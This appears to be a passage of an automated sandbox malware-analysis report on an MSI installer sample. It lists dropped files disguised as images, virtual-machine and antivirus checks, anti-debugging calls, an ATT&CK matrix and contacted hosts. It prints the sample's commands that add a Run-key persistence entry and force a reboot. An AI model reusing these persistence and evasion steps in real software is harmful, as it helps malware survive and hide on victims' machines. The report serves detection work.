Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597031Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596922Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596813Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596688Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596578Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596469Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596344Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596234Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596125Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeWindow / User API: threadDelayed 1627Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeWindow / User API: threadDelayed 8199Jump to behavior
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7003.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6F47.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7033.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\Public\PeFI\vJrY\PeFI.pngJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI62DE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9F25.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6185.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6530.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi64B2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI635C.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6F17.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6467.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6487.tmpJump to dropped file
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeAPI coverage: 9.0 %
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7208Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -32281802128991695s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -599875s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -599766s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -599656s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -599547s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -599438s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -599313s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -599188s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -599063s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -598952s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -598724s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -598594s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -598484s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -598375s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -598266s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -598156s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -598047s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -597938s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -597813s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -597703s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -597594s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -597469s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -597359s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -597250s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -597141s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -597031s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -596922s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -596813s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -596688s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -596578s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -596469s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -596344s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -596234s >= -30000sJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944Thread sleep time: -596125s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0043303C FindFirstFileExW,12_2_0043303C
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00424DC6 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,12_2_00424DC6
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00424DA6 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,12_2_00424DA6
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_004231FD VirtualQuery,GetSystemInfo,12_2_004231FD
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599656Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599547Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599438Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599313Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599188Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599063Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598952Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598724Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598594Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598484Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598375Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598266Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598156Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598047Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597938Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597813Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597703Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597594Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597469Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597359Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597250Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597141Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597031Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596922Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596813Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596688Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596578Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596469Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596344Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596234Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596125Jump to behavior
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: HPC Edition7HPC Edition without Hyper-V
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: Single LanguagesWindows Small Business Server Premium (core installation)5Server for SB Solutions EM3Enterprise Storage Server1Solution Embedded Server1Microsoft Hyper-V Server
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: Unknown productkEnterprise Server without Hyper-V (core installation)
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: Advanced ServereWindows Essential Server Solutions without Hyper-V
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: AtivoYFRviEC0n/N4+2AwLUvqsG68H4biL3/f1MGMfyvTFpzc=YwiRuB1adGDdROivLAf5L7N/vPu2LM0g/HsqQXZQJFEc=CEssential Business Server ADDLSVCWServer Enterprise (evaluation installation)kDatacenter Server without Hyper-V (core installation)
Source: PeFIvJrY.exe, 0000000C.00000003.3034144504.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, PeFIvJrY.exe, 0000000C.00000003.3380949220.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, PeFIvJrY.exe, 0000000C.00000002.3836856328.0000000000A43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: WorkstationgStandard Server without Hyper-V (core installation)
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: Ultimate[Enterprise Storage Server (core installation)7PRODUCT_EMBEDDED_INDUSTRY_E-Express Storage ServerUExpress Storage Server (core installation)cStorage Server Standard (evaluation installation)+SB Solution Server EMCDatacenter Server without Hyper-V
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: CEnterprise Server without Hyper-V
Source: 495fa1.msi.2.drBinary or memory string: 01234567890.0.0.0.%dVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IROOT\CIMV2SELECT * FROM Win32_ComputerSystemSELECT * FROM Win32_BIOSManufacturerModelVersionGetting system informationManufacturer [Model [BIOS [IsWow64Processkernel32Software\Microsoft\Windows NT\CurrentVersionSYSTEM\CurrentControlSet\Control\ProductOptionsCurrentMajorVersionNumberCurrentMinorVersionNumberCurrentVersionCurrentBuildNumberReleaseIdCSDVersionProductTypeProductSuiteWinNTServerNTSmall BusinessEnterpriseBackOfficeCommunicationServerTerminal ServerSmall Business(Restricted)EmbeddedNTDataCenterPersonalBladeEmbedded(Restricted)Security ApplianceStorage ServerCompute Server Failed to create IWbemLocator object. Error code: \\Could not connect to WMI provider. Error code: Failed to initialize security. Error code: Could not set proxy blanket. Error code: WQLWMI Query failed: []. Error code:
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: Ultimate E?Standard Server without Hyper-V
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00426602 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00426602
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0040CB80 NtQuerySystemInformation,NtQuerySystemInformation,SysAllocStringLen,GetCurrentProcessId,GetLastError,NtQueryInformationProcess,NtQueryInformationProcess,CloseHandle,12_2_0040CB80
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_004318C6 mov eax, dword ptr fs:[00000030h]12_2_004318C6
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00431882 mov eax, dword ptr fs:[00000030h]12_2_00431882
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0042EC45 mov ecx, dword ptr fs:[00000030h]12_2_0042EC45
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_003E40C0 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,GetProcessHeap,HeapFree,12_2_003E40C0
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00426602 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00426602
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00426796 SetUnhandledExceptionFilter,12_2_00426796
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_004259D6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_004259D6
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00428FA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00428FA3
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"Jump to behavior
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003336000.00000004.00000800.00020000.00000000.sdmp, PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003396000.00000004.00000800.00020000.00000000.sdmp, PeFIvJrY.exe, 0000000C.00000002.3847929255.000000000364C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0042622C cpuid 12_2_0042622C
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeQueries volume information: C:\Users\Public\PeFI\vJrY\WebView2Loader.dll VolumeInformationJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00425626 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,12_2_00425626
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media		3
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		12
Process Injection		1
Deobfuscate/Decode Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder		21
Obfuscated Files or Information		Security Account Manager3
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing		NTDS45
System Information Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp		LSA Secrets51
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials2
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion		DCSync41
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Masquerading		Proc Filesystem1
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Modify Registry		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
Virtualization/Sandbox Evasion		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1486731 Sample: 9rybs.msi Startdate: 02/08/2024 Architecture: WINDOWS Score: 64 53 yznv.prefintions.pro 2->53 55 fp2e7a.wpc.phicdn.net 2->55 57 3 other IPs or domains 2->57 65 Sigma detected: New RUN Key Pointing to Suspicious Folder 2->65 67 Machine Learning detection for dropped file 2->67 69 AI detected suspicious sample 2->69 71 2 other signatures 2->71 10 msiexec.exe 3 23 2->10         started        13 PeFIvJrY.exe 15 3 2->13         started        16 PeFIvJrY.exe 2->16         started        18 msiexec.exe 2 2->18         started        signatures3 process4 dnsIp5 45 C:\Windows\Installer\MSI9F25.tmp, PE32 10->45 dropped 47 C:\Windows\Installer\MSI7033.tmp, PE32 10->47 dropped 49 C:\Windows\Installer\MSI7003.tmp, PE32 10->49 dropped 51 7 other malicious files 10->51 dropped 20 msiexec.exe 2 69 10->20         started        63 20.15.106.83, 49712, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->63 file6 process7 dnsIp8 59 yznv.prefintions.pro 188.114.97.3, 443, 49706, 49707 CLOUDFLARENETUS European Union 20->59 61 collect.installeranalytics.com 52.54.161.79, 49710, 80 AMAZON-AESUS United States 20->61 37 C:\Users\Public\PeFI\vJrY\vJrY.png (copy), PE32 20->37 dropped 39 C:\Users\...\WebView2Loader.dll.png (copy), PE32 20->39 dropped 41 C:\Users\Public\...\WebView2Loader.dll (copy), PE32 20->41 dropped 43 5 other files (3 malicious) 20->43 dropped 73 Uses shutdown.exe to shutdown or reboot the system 20->73 25 cmd.exe 1 20->25         started        27 shutdown.exe 1 20->27         started        file9 signatures10 process11 process12 29 reg.exe 1 1 25->29         started        31 conhost.exe 25->31         started        33 conhost.exe 27->33         started        process13 35 conhost.exe 29->35         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
9rybs.msi8%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\PeFI\vJrY\PeFI.png100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\shi64B2.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shi6530.tmp0%ReversingLabs
C:\Windows\Installer\MSI6185.tmp0%ReversingLabs
C:\Windows\Installer\MSI62DE.tmp0%ReversingLabs
C:\Windows\Installer\MSI635C.tmp0%ReversingLabs
C:\Windows\Installer\MSI6467.tmp0%ReversingLabs
C:\Windows\Installer\MSI6487.tmp0%ReversingLabs
C:\Windows\Installer\MSI6F17.tmp0%ReversingLabs
C:\Windows\Installer\MSI6F47.tmp0%ReversingLabs
C:\Windows\Installer\MSI7003.tmp0%ReversingLabs
C:\Windows\Installer\MSI7033.tmp0%ReversingLabs
C:\Windows\Installer\MSI9F25.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://www.thawte.com/cps0/0%URL Reputationsafe
https://www.thawte.com/repository0W0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://collect.installeranalytics.com/0%Avira URL Cloudsafe
http://html4/loose.dtd0%Avira URL Cloudsafe
